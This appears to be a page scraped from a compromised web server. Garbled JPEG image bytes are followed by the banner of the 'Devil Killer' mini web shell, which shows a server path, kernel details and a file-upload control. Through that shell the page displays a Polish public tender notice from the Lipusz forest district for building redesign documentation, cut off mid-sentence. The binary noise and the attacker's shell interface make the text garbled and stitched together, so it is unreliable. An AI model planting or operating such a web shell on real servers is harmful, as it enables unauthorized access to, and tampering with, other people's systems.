JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250611/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250611/0027229401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej przebudowy budynku administracyjnego oraz budynku magaz.-garaż. z jego adaptacją na potrzeby posterunku Straży Leśn. i przebudową znajdującej się w nim kotłowni. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Lipusz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190036737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brzozowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipusz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-424</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 680 07 80</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lipusz@gdansk.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">lipusz.gdansk.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej przebudowy budynku administracyjnego oraz budynku magaz.-garaż. z jego adaptacją na potrzeby posterunku Straży Leśn. i przebudową znajdującej się w nim kotłowni. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5810b5d-e024-4b04-b6a2-dff2c57e2fc0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00272294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00025001/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowej przebudowy budynku administracyjnego oraz budynku magazynowo - garażowego wraz z jego adaptacją na potrzeby Straży Leśnej oraz przebudową kotłowni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1119015 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy on-line działającej pod adresem: <br/>https://platformazakupowa.pl/transakcja/1119015</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany według czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “ROZPORZĄDZENIEM PREZESA RADY MINISTRÓW z dnia 21 maja 2024r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a)	.zip <br/>b)	.7Z<br/>Wśród formatów powszechnych, a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>Oferta, przedmiotowe środki dowodowe (jeżeli są wymagane), podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, Wykonawca składa w formie elektronicznej lub postaci elektronicznej opatrzonej elektronicznym podpisem kwalifikowanym lub podpisem zaufanym lub podpisem osobistym.<br/>Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Leśne- Lasy Państwowe Nadleśnictwo Lipusz ul. Brzozowa 2, 83-424 Lipusz tel. 58 680-07-80, e-mail: lipusz@gdansk.lasy.gov.pl ;<br/>2) inspektorem ochrony danych osobowych Pan Jacek Kędzierski e-mail: lipusz@gdansk.lasy.gov.pl ;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Opracowanie dokumentacji projektowej przebudowy budynku administracyjnego oraz budynku magazynowo - garażowego wraz z jego adaptacją na potrzeby posterunku Straży Leśnej oraz przebudową znajdującej się w nim kotłowni Nadleśnictwa Lipusz” – znak sprawy: SA5.270.14.2.2025, prowadzonym w trybie podstawowym;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”; <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust.1-3 Rozporządzenia 2016/679 wymagałoby niewspółmiernie dużego wysiłku, Zamawiający zastrzega sobie prawo żądania od osoby, której dane dotyczą wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu. <br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA5.270.14.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 276262,20 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej przebudowy budynku administracyjnego oraz budynku magazynowo - garażowego wraz z jego adaptacją na potrzeby posterunku Straży Leśnej oraz przebudową znajdującej się w nim kotłowni Nadleśnictwa Lipusz.<br/>Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowej dla następujących inwestycji:<br/>1. Przebudowa budynku administracyjnego Nadleśnictwa Lipusz wraz z aranżacją wnętrz; <br/>2. Przebudowa budynku magazynowo - garażowego wraz z jego adaptacją na potrzeby Straży Leśnej; <br/>3. Przebudowa kotłowni Nadleśnictwa Lipusz wraz z wymianą źródła ciepła. <br/>Stan istniejący oraz szczegółowe opisy przedmiotu zamówienia przedstawiają załączniki nr 1 i 2 do SWZ. Wymieniony w załączniku nr 1 i 2 do SWZ zakres projektowanych robót budowlanych nie jest katalogiem zamkniętym. Ostateczny zakres projektowanych robót budowlanych będzie zależny od zidentyfikowanych potrzeb, możliwości przebudowy obiektów oraz przyjętych koncepcji i rozwiązań projektowych. Proponuje się aby dla obu przebudowywanych budynków w zakresie wykończenia wnętrz stosować podobne rozwiązania projektowe.<br/>Zamawiający zakłada, że budynek administracyjny nadleśnictwa po przebudowie będzie pełnił rolę nowoczesnego budynku biurowego o wszelkich aspektach i funkcjach przewidzianych dla tego typu budynków wykorzystując maksymalnie jego ograniczoną, fizyczną wielkość.<br/>Realizacja zamówienia przewiduje poszczególne etapy prac: <br/>1) Etap I - wykonanie inwentaryzacji budynków, świadectwa charakterystyki energetycznej, audytu termowizyjnego i energetycznego oraz opracowanie i uzgodnienie z Zamawiającym koncepcji przebudowy budynków i kotłowni oraz aranżacji wnętrz budynku administracyjnego nadleśnictwa (trzy warianty - należy przez to rozumieć możliwość trzykrotnej zmiany koncepcji dla każdego z budynków i kotłowni przez Zamawiającego) w celu dostosowania do wymagań funkcjonalno - użytkowych Zamawiającego oraz obowiązujących przepisów. Zamawiający wymaga każdorazowo przedstawienia wizualizacji 3D koncepcji przebudowy budynków, kotłowni i aranżacji wnętrz; <br/>2) Etap II - opracowanie projektu architektoniczno - budowlanego przebudowy budynków, projektu wykonawczego (technicznego) oraz przedmiarów i kosztorysów inwestorskich przebudowy budynków i kotłowni wraz ze szczegółowym projektem aranżacji, wyposażenia i wykończenia wnętrz budynku administracyjnego Nadleśnictwa. Wnętrza budynków powinny cechować się standardem wykończenia znacznie podniesionym w stosunku do aktualnego zgodnie ze wskazaniami i oczekiwaniami Zamawiającego. <br/>3) Etap III - Nadzór autorski w czasie wykonywania robót. Wykonawca - projektant jest zobowiązany do pełnienia nadzoru autorskiego w trakcie realizacji inwestycji na zasadach określonych we wzorze umowy. Nadzór autorski sprawowany będzie począwszy od dnia rozpoczęcia robót budowlanych realizowanych na podstawie dokumentacji projektowej będącej przedmiotem niniejszej umowy i trwał będzie nieprzerwanie do czynności odbioru końcowego.<br/>Realizacja zamówienia obejmuje: <br/>1) opracowanie koncepcji architektoniczno-budowlanej przebudowy i remontów przedmiotowych budynków i kotłowni oraz aranżacji wnętrz budynku administracyjnego Nadleśnictwa wraz ze zmianami architektoniczno - budowlanymi i funkcjonalnymi oraz z wykonaniem kompleksowego programu prac remontowych i naprawczych w celu dostosowania budynków do wymagań i potrzeb pracowników, dostosowanie budynków i instalacji do aktualnie obowiązujących, warunków technicznych i przepisów w tym przepisów p-poż oraz do obecnych standardów jakie występują w podobnych obiektach na terenie Polski. <br/>2) opracowanie wielobranżowej dokumentacji projektowej architektoniczno - budowlanej dla uzyskania pozwolenia na budowę; <br/>3) opracowanie wielobranżowej dokumentacji projektowej wykonawczej (technicznej) umożliwiającej realizację prac po uzyskaniu pozwolenia na budowę;<br/>4) podział prac na etapy ze wskazaniem na zakres i lokalizację prac remontowych i zakres przebudowy (np. remont i przebudowa poszczególnych budynków czy kotłowni, poszczególnych poziomów - kondygnacji - jako odrębne etapy itp.) <br/>5) sporządzenie szczegółowych kosztorysów inwestorskich budowlanych oraz przedmiarów robót dla wszystkich branż. Kosztorysy inwestorskie oraz przedmiary robót winy uwzględniać podział na poszczególne kondygnacje i pomieszczenia. <br/>Koncepcja architektoniczno-budowlana, wielobranżowa dokumentacja architektoniczno-budowlana oraz wielobranżowa dokumentacja wykonawcza (techniczna) powinny zostać opracowane zgodnie z obowiązującymi przepisami i normami przez wykwalifikowanych projektantów w odpowiednich branżach i specjalnościach odrębnie dla każdego budynku tj. odrębnie dla budynku administracyjnego i odrębnie dla budynku magazynowo - garażowego zaadaptowanego na potrzeby posterunku Straży Leśnej i znajdującej się w nim kotłowni. Dokumentacja powinna zawierać rozwiązania projektowe, które dostosują budynki do wymagań i potrzeb pracowników, które dostosują budynki i instalacje do aktualnie obowiązujących warunków technicznych i przepisów w tym przepisów p-poż. Dokumentacja ma zawierać kompleksowy program prac remontowych i naprawczych. Opracowanie ma zawierać szacunkową wycenę robót budowlanych i instalacyjnych (kosztorysy inwestorskie), sporządzoną w oparciu o przedmiotową dokumentację.<br/>Wielobranżowa dokumentacja projektowa powinna zostać opracowana zgodnie z obowiązującymi przepisami normami na podstawie zaakceptowanej przez Zamawiającego koncepcji projektowej. Dokumentacja winna być sporządzona przez wykwalifikowanych projektantów w odpowiednich branżach i specjalnościach odrębnie dla każdego budynku tj. odrębnie dla budynku administracyjnego i odrębnie dla budynku magazynowo - garażowego zaadaptowanego na potrzeby Straży Leśnej i znajdującej się w nim kotłowni. Wykonana wielobranżowa dokumentacja wykonawcza (techniczna), dokumentacja kosztorysowa powinny umożliwić wybór Wykonawcy prac i realizacje robót budowlanych, natomiast projekt architektoniczno-budowlany pozwolić na wystąpienie i uzyskanie pozwolenia na budowę. Dokumentacja projektowa powinna zawierać wszelkie rozwiązania techniczne i materiałowe, ekspertyzy techniczne, projekty towarzyszące, uszczegółowienia rozwiązań technicznych oraz winna być uzgodniona z wszelkimi służbami, dostawcami i odbiorcami mediów oraz jednostkami biorącymi udział w procesie tworzenia ww. dokumentacji w tym z Wojewódzkim Konserwatorem Zabytków. <br/>UWAGA!<br/>Zamawiający zastrzega sobie prawo do wnoszenia zmian i uwag do rozwiązań projektowych, technologicznych i materiałowych przez cały okres prac nad dokumentacją do momentu ostatecznej akceptacji kompletnej dokumentacji. Wykonawca ma obowiązek uwzględnić wniesione zmiany i uwagi lub rzeczowo uargumentować dlaczego zmiana taka nie będzie leżała w interesie Zamawiającego. <br/>Zakres prac do wykonania: <br/>1) Analiza stanu istniejącego: <br/>a) Ocena techniczna budynków oraz terenu wokół;<br/>b) Wykonanie świadectwa charakterystyki energetycznej każdego budynku; <br/>c) Wykonanie audytu termowizyjnego zgodnego z normą PN-EN 13187 każdego budynku;<br/>d) Wykonanie audytu energetycznego każdego budynku, o którym mowa w ustawie z dnia 21 listopada 2008r. o wspieraniu termomodernizacji i remontów oraz centralnej ewidencji emisyjności budynków (Dz. U. z 2024 r. poz. 1446 z późn. zm.) wskazującego rozwiązania optymalne w szczególności z punktu widzenia kosztów realizacji przedsięwzięcia oraz oszczędności energii, stanowiące jednocześnie założenia do niniejszego projektu budowlanego. Wykonawca winien uwzględnić w audycie energetycznym każdego z budynków ogrzewanie z kotłowni zdalaczynnej, dostarczającej ciepło i ciepłą wodę użytkową do trzech budynków tj. budynku administracyjnego, budynku magazynowo - garażowego zaadaptowanego na potrzeby Straży Leśnej oraz budynku administracyjno-edukacyjnego. <br/>e) Zidentyfikowanie potrzeb oraz możliwości przebudowy budynków i kotłowni;<br/>2) Projekt architektoniczno-budowlany:<br/>a) Opracowanie koncepcji przebudowy wnętrz budynków z uwzględnieniem nowych rozwiązań funkcjonalnych i przedstawienie ich do akceptacji Zamawiającemu,<br/>b) Zaprojektowanie nowych elementów wyposażenia w budynku administracyjnym Nadleśnictwa (meble, sprzęt, instalacje) i przedstawienie ich do akceptacji Zamawiającemu,<br/>c) Zmiana układu funkcjonalnego budynków w tym ewentualne wyburzenia i dobudowy; <br/>d) Zapewnienie dostępności budynków dla osób z niepełnosprawnościami.<br/>3) Instalacje techniczne: opracowanie projektów wszystkich wymaganych instalacji w tym elektrycznych, wodno-kanalizacyjnych, grzewczych, alarmowych, sieci komputerowych;<br/>4) Przygotowanie pełnej dokumentacji projektowej w tym projektów wykonawczych (technicznych) oraz kosztorysów, wizualizacji, przedmiarów robót. <br/>5) Uzgodnienia związane z przebudową budynku administracyjnego Nadleśnictwa z Wojewódzkim Konserwatorem Zabytków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">79932000-6 - Usługi projektowania wnętrz</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za 